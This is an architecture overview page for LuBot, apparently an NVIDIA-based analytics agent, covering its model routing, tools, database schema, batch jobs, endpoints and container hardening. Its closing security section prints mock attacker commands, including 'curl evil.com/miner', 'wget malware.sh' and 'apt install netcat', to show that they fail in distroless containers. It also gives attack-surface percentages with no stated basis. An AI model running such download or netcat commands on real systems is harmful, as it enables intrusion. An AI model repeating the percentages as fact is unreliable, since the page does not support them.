
LuBot Architecture

Enterprise AI Self-Learning Analytics Platform - 100% NVIDIA Powered

122,728 Lines of Code
273 Source Files
36 Database Tables
42 API Endpoints
18 Batch Workers
28 AI Tools
🛡️ 99% Secured Distroless Containers

LuBot AI Models — 6 NVIDIA Models

☁️ Cloud Models (via NVIDIA NIM API)

NVIDIA Nemotron Ultra (253B)
Intent Routing • Query Enrichment • Document QA • PhD-Level Analysis
NVIDIA Nemotron Nano (8B)
Code Generation • Fast Analytics • Simple Queries • 50K tok/s
NVIDIA Nemotron Vision (12B VL)
Image & Screenshot Analysis • Multi-Modal Understanding
NVIDIA NV-EMBEDQA-E5-v5
1024-dim Semantic Embeddings • Intent Matching • FAISS Search
NVIDIA Nemotron-3-Nano (30B)
1M Context • On-Premise GPU • Self-Hosted RTX 4090
NVIDIA Nemotron-mini (2.7B)
Ultra-Light • Real-Time Inference • Self-Hosted RTX 4090 via Ollama

🏗️ Infrastructure

NVIDIA NIM API
Cloud Inference Endpoint • integrate.api.nvidia.com/v1
NVIDIA RTX 4090
On-Premise GPU • 24GB VRAM • Nemotron-3-Nano + Nemotron-mini
AdalFlow
LLM Orchestration Framework • AI Agent Pipeline Engine
Groq (Fallback)
<1% • Emergency Fallback Only
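
The primary-plus-emergency-fallback arrangement listed above can be sketched as an ordered list of providers, where a later provider is tried only if every earlier one fails. This is a minimal illustration under stated assumptions, not LuBot's implementation: `call_with_fallback`, `flaky_primary`, and `backup` are hypothetical names, and the providers are plain callables standing in for real API clients.

```python
from typing import Callable, Sequence, Tuple

# Hypothetical provider type: takes a prompt, returns generated text.
Provider = Callable[[str], str]


def call_with_fallback(
    prompt: str, providers: Sequence[Tuple[str, Provider]]
) -> Tuple[str, str]:
    """Try each provider in order and return (provider_name, response).

    The first entry is the primary; later entries are used only when
    every earlier provider raised an exception.
    """
    errors = []
    for name, provider in providers:
        try:
            return name, provider(prompt)
        except Exception as exc:  # a real client would catch narrower errors
            errors.append(f"{name}: {exc}")
    raise RuntimeError("all providers failed: " + "; ".join(errors))


# Stand-ins for real clients (assumptions for illustration only).
def flaky_primary(prompt: str) -> str:
    raise TimeoutError("primary endpoint timed out")


def backup(prompt: str) -> str:
    return f"backup answer to: {prompt}"


used, answer = call_with_fallback(
    "How many employees?", [("nim", flaky_primary), ("groq", backup)]
)
```

Keeping the provider order in data rather than in nested try/except blocks makes it easy to log which provider served each request, which is how a figure such as the fallback share could be measured.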

🧬 Self-Learning Architecture

LuBot: A Self-Learning AI Agent

LuBot combines proven engineering patterns into a self-learning analytics platform. Through 18 nightly batch workers, 36 database tables tracking user behavior, and adaptive learning systems, LuBot improves over time: it learns your preferences, optimizes response routes, and personalizes insights based on your interaction patterns. Every query makes LuBot better at serving you.

🔄 Request Flow Architecture

User Query → Query Enrichment (253B Rewrite) → Intent Classifier (4-Tier) → Route Decision (253B) → Tool Execution → Grounded Pipeline → Response

🧠 RAG & Embedding Pipeline — NVIDIA Powered

NVIDIA NV-EmbedQA-E5-V5
1024-dim
Semantic Embedding Model • 335M Parameters
Powers all vector search, intent matching & memory retrieval
Text Input → NVIDIA Embed (1024-dim Vector) → FAISS Index (Vector Store) → Retrieved Context (Top-K Similar) → Augmented LLM (Grounded Response)

6 Embedding-Powered Features

📄 Document RAG
Uploaded files chunked & embedded into 1024-dim vectors. FAISS retrieves relevant passages to ground LLM responses in real data.
🎯 Tier 2 Intent Matching
User queries embedded & compared via cosine similarity to known intent vectors. Semantic routing without LLM calls.
💬 Conversation Embeddings
Every conversation indexed as vectors. Enables semantic memory search across all past interactions.
🔗 Semantic Clustering
Nightly batch worker groups similar queries by vector proximity. Discovers usage patterns automatically.
📚 Few-Shot RAG Learning
Retrieves similar past Q&A pairs as few-shot examples. Response quality improves with every conversation.
🔍 FAISS Vector Search
Facebook AI Similarity Search engine. Sub-millisecond approximate nearest neighbor across all vector indexes.
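
The Document RAG flow described above (embed the text, retrieve the top-K most similar passages, then ground the prompt in them) can be sketched in a few lines. This is an illustration under assumptions: the 3-dimensional vectors stand in for the 1024-dim NVIDIA embeddings, the brute-force cosine search stands in for a FAISS index, and `cosine`, `top_k`, and `build_prompt` are hypothetical helper names.

```python
import math
from typing import List, Sequence, Tuple


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity between two vectors (0.0 if either is all zeros)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def top_k(
    query_vec: Sequence[float],
    index: List[Tuple[str, Sequence[float]]],
    k: int = 2,
) -> List[Tuple[str, float]]:
    """Brute-force nearest neighbours; a vector index replaces this at scale."""
    scored = [(text, cosine(query_vec, vec)) for text, vec in index]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)[:k]


def build_prompt(question: str, passages: Sequence[str]) -> str:
    """Ground the LLM by placing retrieved passages ahead of the question."""
    context = "\n".join(f"- {p}" for p in passages)
    return f"Answer using only this context:\n{context}\n\nQuestion: {question}"


# Toy index: (passage, embedding). Real embeddings come from the embed model.
index = [
    ("Q3 revenue was $2M.", [0.9, 0.1, 0.0]),
    ("The office is in Chicago.", [0.0, 0.2, 0.9]),
    ("Q3 marketing spend was $300K.", [0.7, 0.6, 0.1]),
]
query_vec = [1.0, 0.2, 0.0]  # pretend embedding of the question below
hits = top_k(query_vec, index, k=2)
prompt = build_prompt("What was Q3 revenue?", [text for text, _ in hits])
```

The same `top_k` shape also covers the few-shot case: index past Q&A pairs instead of document chunks and paste the hits into the prompt as examples.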

🎯 The LuBot Cascade — 4-Tier Intent Routing

If the agent can figure out what the user wants without calling an LLM, it should. Each stage tries the cheapest method first and only escalates when needed — 95% of routing decisions cost zero LLM tokens.

Tier 0 - Deterministic Detection 0ms - Regex
PhD Analysis Correlation Concentration Anomaly Web Search Fast-Path
Tier 1 - Core Intents (80% of queries) 0ms - Pattern Match
GREETING • IDENTITY • CAPABILITIES • MEMORY_RECALL • MEMORY_UPDATE • DATA_MODE_SWITCH • DATA_QUERY • WEB_SEARCH • DOCUMENT_QA • PREDICTION • DOCUMENT_GENERATION • DATA_LIBRARY • GENERAL
Tier 2 - NVIDIA Embeddings (15% of queries) 5ms - Semantic
ADVICE_REQUEST • FOLLOWUP • CLARIFICATION • DEEP_DIVE • COMPARISON
Tier 3 - NVIDIA LLM Fallback (5% of queries) 100ms - LLM
Ambiguous Queries • Complex Multi-Intent • Edge Cases
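
The cascade above can be sketched as a single function that tries each tier in order and returns as soon as one succeeds. This is a minimal sketch, not LuBot's classifier: the regex, the keyword table, the 0.8 similarity threshold, the toy 2-dimensional intent vectors, and the names `classify`, `fake_embed`, `fake_llm`, and `route` are all assumptions made for illustration.

```python
import math
import re
from typing import Callable, Dict, Sequence, Tuple

# Tier 0: deterministic regex rules (this pattern is illustrative only).
TIER0_RULES = [(re.compile(r"\bcorrelat", re.IGNORECASE), "CORRELATION")]

# Tier 1: keyword patterns for core intents (tiny illustrative subset).
TIER1_KEYWORDS = {"hello": "GREETING", "who are you": "IDENTITY"}


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def classify(
    query: str,
    embed: Callable[[str], Sequence[float]],
    intent_vectors: Dict[str, Sequence[float]],
    llm_classify: Callable[[str], str],
    threshold: float = 0.8,
) -> Tuple[int, str]:
    """Return (tier_used, intent), escalating only when a tier cannot decide."""
    for pattern, intent in TIER0_RULES:            # Tier 0: regex
        if pattern.search(query):
            return 0, intent
    lowered = query.lower()
    for keyword, intent in TIER1_KEYWORDS.items():  # Tier 1: pattern match
        if keyword in lowered:
            return 1, intent
    vec = embed(query)                              # Tier 2: embeddings
    best_intent, best_score = max(
        ((name, cosine(vec, ref)) for name, ref in intent_vectors.items()),
        key=lambda pair: pair[1],
    )
    if best_score >= threshold:
        return 2, best_intent
    return 3, llm_classify(query)                   # Tier 3: LLM fallback


# Stand-ins for the embedding model and the LLM (assumptions).
INTENT_VECTORS = {"COMPARISON": [1.0, 0.0], "FOLLOWUP": [0.0, 1.0]}


def fake_embed(text: str) -> Sequence[float]:
    return [0.9, 0.1] if "versus" in text.lower() else [0.7, 0.7]


def fake_llm(text: str) -> str:
    return "GENERAL"


def route(query: str) -> Tuple[int, str]:
    return classify(query, fake_embed, INTENT_VECTORS, fake_llm)
```

Returning the tier alongside the intent makes it straightforward to count how many decisions each tier handled.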

3-Tier Response System (Smart Model Routing)

Routes queries to the optimal NVIDIA model based on complexity.

Tier 0 - DIRECT (No LLM Needed) 0ms - Template
Criteria: Simple aggregation (COUNT, SUM, AVG) with 1 row result
user_generic_count • user_generic_total • user_generic_avg • user_generic_min • user_generic_max
Example: "How many employees?" → "You have 320 employees"
Tier 1 - ENHANCED (Nemotron Nano 8B) 50ms - 50K tok/s
Criteria: Medium complexity, GROUP BY with 2-10 rows, basic analysis
Tables with insights • Grouped summaries • Top N queries • Basic comparisons
Example: "Revenue by department" → Table + "Sales is highest at $2M"
Tier 2 - FULL PhD (Nemotron Ultra 253B) 500ms - 253B params
Criteria: Statistical analysis OR >10 rows requiring deep insights
correlation • concentration • simpsons_paradox • outliers • trend • comparison
Example: "Correlation between sales and marketing?" → "Pearson r=0.95, p<0.001 - strong positive"
🔄 Routing Flow
Query → ResponseTierRouter.get_response_tier() → Tier 0 | Tier 1 | Tier 2 → LLMRouter → NVIDIA Model
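
The tier criteria listed above translate into a short decision function. The sketch below is an assumption-laden illustration rather than the actual `ResponseTierRouter`: `QueryResult` and `pick_response_tier` are hypothetical names, and sending any result that matches neither the Tier 0 nor the Tier 2 criteria to Tier 1 is a guess about the default.

```python
from dataclasses import dataclass

# Analysis types that the text above assigns to the full Tier 2 path.
STATISTICAL = {
    "correlation", "concentration", "simpsons_paradox",
    "outliers", "trend", "comparison",
}


@dataclass
class QueryResult:
    """Hypothetical summary of a query's result, used only for routing."""
    row_count: int
    analysis_type: str = ""            # e.g. "correlation"; empty for plain SQL
    is_simple_aggregate: bool = False  # COUNT / SUM / AVG / MIN / MAX


def pick_response_tier(result: QueryResult) -> int:
    """Map a result to tier 0 (template), 1 (Nano), or 2 (Ultra)."""
    # Tier 2: statistical analysis OR more than 10 rows.
    if result.analysis_type in STATISTICAL or result.row_count > 10:
        return 2
    # Tier 0: simple aggregation that produced exactly one row.
    if result.is_simple_aggregate and result.row_count == 1:
        return 0
    # Tier 1: everything in between (assumed default).
    return 1
```

For example, `pick_response_tier(QueryResult(row_count=1, is_simple_aggregate=True))` selects the template path, while a five-row grouped summary goes to Tier 1.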

🛠️ AI Tools & Capabilities (28)

📊 Data & Query Tools

1. SQL Query Engine
Safe SQL execution with injection protection, schema-aware queries
2. SQL Template Matcher
Pattern matching for SQL generation, 30+ templates
3. Schema Extractor
Auto-detect database schema, column mapping
4. Data Analyzer
Metric summaries, trend detection, dimension analysis
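
One common way to get the injection protection mentioned for the SQL Query Engine is to bind user values as parameters and validate identifiers against the known schema. The sketch below shows that technique with Python's built-in `sqlite3` as a stand-in for PostgreSQL; the `employees` table, the `ALLOWED_TABLES` allowlist, and `count_by_department` are hypothetical, and nothing here is taken from LuBot's code.

```python
import sqlite3

# Hypothetical allowlist, e.g. produced by a schema extractor.
ALLOWED_TABLES = {"employees"}


def count_by_department(conn: sqlite3.Connection, table: str, department: str) -> int:
    """Count rows for one department without interpolating user values."""
    # Identifiers cannot be bound as parameters, so check them explicitly.
    if table not in ALLOWED_TABLES:
        raise ValueError(f"unknown table: {table!r}")
    # The department value is bound with "?", never formatted into the SQL.
    row = conn.execute(
        f"SELECT COUNT(*) FROM {table} WHERE department = ?", (department,)
    ).fetchone()
    return row[0]


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employees (name TEXT, department TEXT)")
conn.executemany(
    "INSERT INTO employees VALUES (?, ?)",
    [("Ana", "Sales"), ("Ben", "Sales"), ("Cy", "Ops")],
)

sales_count = count_by_department(conn, "employees", "Sales")
# A classic injection string is treated as an ordinary (non-matching) value.
injected_count = count_by_department(conn, "employees", "Sales' OR '1'='1")
```

Because the injected string is compared as data, it matches no department and the count is zero instead of the whole table.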

📈 Visualization Tools

5. Chart Generator
15+ Plotly chart types: bar, line, pie, scatter, heatmap, etc.
6. Chart Preference Parser
Learn user preferences, personalized defaults
7. Report Generator
PDF, Excel, Word export with charts and insights
8. Report Intelligence
Executive summaries, traffic insights, recommendations

🔬 PhD-Level Intelligence (7 Analyzers)

9. Correlation Analysis
Pearson/Spearman correlation, statistical significance
10. Concentration Analysis
Pareto analysis, Gini coefficient, HHI index
11. Simpson's Paradox
Mix shift detection, segment-level reversal analysis
12. Anomaly Detection
Statistical outliers, Z-score, IQR methods
13. Drivers Analysis
Sensitivity analysis, impact attribution
14. Scenario Analysis
What-if projections, growth scenarios
15. Timeseries Analysis
7 sub-analyzers, including trend, seasonality, volatility, and momentum
16. Prediction Tools
Prophet forecasting, trend analysis, future projections
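
Several of the measures named above have compact textbook definitions. The sketch below shows three of them (the HHI index and Gini coefficient from Concentration Analysis, and the IQR rule from Anomaly Detection) using only the standard library. The function names are hypothetical, the 1.5 multiplier is the conventional default rather than a value from the source, and LuBot's analyzers may compute these differently.

```python
import statistics
from typing import List, Sequence


def hhi(values: Sequence[float]) -> float:
    """Herfindahl-Hirschman Index: sum of squared percentage shares (0-10000)."""
    total = sum(values)
    return sum((v / total * 100) ** 2 for v in values)


def gini(values: Sequence[float]) -> float:
    """Gini coefficient: 0 means perfectly equal, (n-1)/n means one holder."""
    xs = sorted(values)
    n = len(xs)
    weighted = sum(rank * x for rank, x in enumerate(xs, start=1))
    return 2 * weighted / (n * sum(xs)) - (n + 1) / n


def iqr_outliers(values: Sequence[float], k: float = 1.5) -> List[float]:
    """Values outside [Q1 - k*IQR, Q3 + k*IQR]."""
    q1, _, q3 = statistics.quantiles(values, n=4)
    spread = q3 - q1
    low, high = q1 - k * spread, q3 + k * spread
    return [v for v in values if v < low or v > high]


revenue_by_customer = [50, 30, 20]
daily_visits = [10, 12, 11, 13, 12, 11, 95]

concentration = hhi(revenue_by_customer)
inequality = gini(revenue_by_customer)
spikes = iqr_outliers(daily_visits)
```

With shares of 50%, 30%, and 20%, the HHI is 2500 + 900 + 400 = 3800, and the single 95-visit day is the only value flagged by the IQR rule.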

🧠 AI Processing Pipeline

17. Grounded Pipeline
20-stage response generation with fact extraction
18. Code Interpreter
Python execution, 20+ analysis templates
19. LLM Router
Intelligent model routing, Nano vs Ultra selection
20. Response Tier Router
Complexity detection, tier assignment

🌐 External Integration Tools

21. Web Search
Real-time web queries with source citations
22. Document RAG
PDF/Word processing, FAISS vector search, Q&A
23. Image Analysis
Vision model integration, multi-modal analysis
24. NVIDIA Embeddings
NV-EMBEDQA-E5-v5 for semantic search

💾 Memory & Storage Tools

25. Memory System
Cross-session memory, conversation indexing, FAISS
26. User Context Builder
Personalization, topic ranking, dimension ordering
27. B2 Cold Storage
Hot/cold pattern: PostgreSQL + Backblaze B2
28. Template Learning
Adaptive learning, route weights, preferences

🗄️ Database Schema (36 Tables)

🏛️ Core Foundation
users
chat_sessions
📦 User Data & Storage
user_uploads
user_uploaded_metrics
user_uploaded_rows
user_uploaded_documents
user_document_chunks
user_document_metadata
user_text_extractions
🧠 Memory & Context
conversation_memory
conversation_embedding_log
generated_output_context
user_conversation_insights
📚 Learning & Preferences
user_preferences
user_chart_preferences
user_route_weights
user_web_search_preferences
user_rag_preferences
user_prediction_preferences
user_report_preferences
preference_events
parameter_learning
template_learning_data
📊 Analytics & Tracking
click_logs
daily_click_summary
landing_visits
daily_landing_summary
user_events
interaction_log
message_feedback
chart_data
👥 Profiles & Segmentation
user_data_profiles
user_daily_summary
user_visitor_segments
user_visitor_segmentation_data
completion_queue

🌐 Demo Mode — Live Data from lubobali.com

LuBot's demo mode uses real-time click data from lubobali.com (portfolio site). Visitors generate live analytics data that LuBot can query, visualize, and analyze — no sample data needed.

lubobali.com (tracker.js) → POST /api/track-click (Real-time API) → click_logs (Neon PostgreSQL) → Click Aggregator (12:00 AM ETL) → daily_click_summary (Aggregated Metrics)
How It Works
1. Collect
The tracker.js script on lubobali.com sends page views, session IDs, time-on-page, and referrer data to LuBot's API in real time.
2. Process
Click Aggregator ETL runs nightly at 12:00 AM — deduplicates events, computes unique pageviews, and builds daily summaries.
3. Query
Users ask LuBot: "Show me top pages" or "Traffic trends this week" — LuBot queries the live data and generates charts.
Data Tracked: Page Views • Session Duration • Time on Page • Referrer Source • Device/Browser • IP Hash (GDPR-safe)
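
The Process step above (deduplicate events, compute unique pageviews, build daily summaries) and the IP hashing can be sketched as follows. The event field names (`event_id`, `day`, `page`, `session_id`), the salted SHA-256 scheme, and the functions `hash_ip` and `aggregate_daily` are assumptions for illustration; the source does not describe the actual ETL or hashing method.

```python
import hashlib
from collections import defaultdict
from typing import Dict, Iterable, Tuple


def hash_ip(ip: str, salt: str) -> str:
    """One-way salted hash so raw IP addresses are never stored."""
    return hashlib.sha256((salt + ip).encode("utf-8")).hexdigest()


def aggregate_daily(events: Iterable[dict]) -> Dict[Tuple[str, str], Dict[str, int]]:
    """Collapse raw click events into per-day, per-page summaries."""
    seen_event_ids = set()
    views = defaultdict(int)     # (day, page) -> total pageviews
    sessions = defaultdict(set)  # (day, page) -> distinct session IDs
    for event in events:
        if event["event_id"] in seen_event_ids:
            continue  # drop duplicate deliveries of the same event
        seen_event_ids.add(event["event_id"])
        key = (event["day"], event["page"])
        views[key] += 1
        sessions[key].add(event["session_id"])
    return {
        key: {"pageviews": views[key], "unique_pageviews": len(sessions[key])}
        for key in views
    }


raw_events = [
    {"event_id": "e1", "day": "2025-01-01", "page": "/home", "session_id": "s1"},
    {"event_id": "e1", "day": "2025-01-01", "page": "/home", "session_id": "s1"},
    {"event_id": "e2", "day": "2025-01-01", "page": "/home", "session_id": "s1"},
    {"event_id": "e3", "day": "2025-01-01", "page": "/home", "session_id": "s2"},
]
summary = aggregate_daily(raw_events)
```

Here the repeated `e1` event is dropped, leaving three pageviews from two distinct sessions for `/home` on that day.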

Nightly Batch Workers (18 Jobs)

12:00 AM - Click Aggregator ETL
12:10 AM - Landing Aggregator ETL
2:00 AM - Route Weights Learning
3:00 AM - Chart Preferences
4:00 AM - Few-Shot RAG Learning
5:00 AM - User Profile Builder
6:00 AM - Data Profile Baselines
6:30 AM - Multi-Tenant Profiles
7:00 AM - GDPR Data Cleanup
7:30 AM - Completion Verification
8:00 AM - Memory Extraction
8:30 AM - Conversation Embeddings
9:00 AM - Semantic Clustering
9:30 AM - Web Search Prefs
10:00 AM - RAG Preferences
10:30 AM - Prediction Prefs
11:00 AM - Report Preferences
11:30 AM - K-Means Segmentation

🔌 API Endpoints (42)

GET /health
GET /health/memory
POST /v1/agent/run
GET /v1/agent/stream
POST /v1/agent/switch-model
GET /v1/agent/current-model
POST /v1/agent/reset-memory
GET /v1/agent/memory-status
POST /api/upload-document
POST /api/upload-data/{user_id}
DELETE /api/users/{id}/files/{name}
GET /api/users/{id}/storage
GET /api/users/{id}/schema
POST /api/users/{id}/data-mode
GET /api/chat-sessions
GET /api/memories
POST /api/interaction
POST /api/feedback
POST /api/analyze-image
GET /api/analytics/topics
POST /api/track-click
POST /api/landing/track
POST /api/landing/update
POST /api/landing/enter
GET /api/segments/chart/{id}
GET /api/chart/{chart_id}
GET /api/download/{file_id}
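
As a rough idea of how a client might call one of these endpoints, the sketch below builds (but does not send) a JSON request for `POST /api/track-click` with the standard library. Only the path comes from the list above. The host `lubot.example` is a placeholder, and the payload field names are guesses based on the tracked data described for demo mode, so the real request schema may differ.

```python
import json
import urllib.request

# Placeholder host; the real base URL is not given in this document.
BASE_URL = "https://lubot.example"


def build_track_click_request(
    page: str, session_id: str, time_on_page: float, referrer: str
) -> urllib.request.Request:
    """Build a POST request for /api/track-click without sending it."""
    payload = {
        # Hypothetical field names, not a documented schema.
        "page": page,
        "session_id": session_id,
        "time_on_page": time_on_page,
        "referrer": referrer,
    }
    return urllib.request.Request(
        BASE_URL + "/api/track-click",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


request = build_track_click_request("/projects", "s-123", 42.5, "https://example.com")
```

Passing the request to `urllib.request.urlopen` would send it; that step is left out here so the example runs without network access.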

🌐 External Services

NVIDIA NIM API
6 NVIDIA Models
Ultra 253B, Nano 8B, Vision 12B VL
NV-EMBEDQA-E5-v5 + Self-Hosted
Groq API
Fallback LLM (<1%)
Emergency backup only
Neon PostgreSQL
Primary Database
36 tables, 230MB+
Real-time OLTP
Backblaze B2
Cold Storage
Raw file storage
Cost-effective archive

🛡️ Container Security — Distroless Architecture

Production-grade container hardening following Google, Netflix, and Stripe security patterns. Every LuBot container runs with a minimal attack surface: no shell, no package manager, and no system utilities for an attacker to use.

BEFORE
Standard Container (Debian or Alpine base)
/bin/sh
/bin/bash
wget
curl
apt / apk
chmod / rm
93%
Exploitable Attack Surface
AFTER
Distroless Container
App Binary
Runtime Only
No Shell
No wget/curl
No Package Mgr
No File Utils
0.01%
Attack Surface — Hackers Trapped

Defense Layers

Distroless Base Image
Google's gcr.io/distroless — contains only app + runtime, zero OS tools
Non-Root Execution
All containers run as UID 1000, so a compromised process does not start with root privileges
Read-Only Filesystem
Immutable container filesystem — nothing can be written or modified
Network Isolation
UFW firewall rules — only ports 80, 443, 22 exposed
What Happens When an Attacker Gets In
$ docker exec container /bin/sh  →  exec failed: no such file or directory
$ wget malware.sh  →  command not found
$ curl evil.com/miner  →  command not found
$ apt install netcat  →  command not found
// Attacker is trapped in an empty room with no tools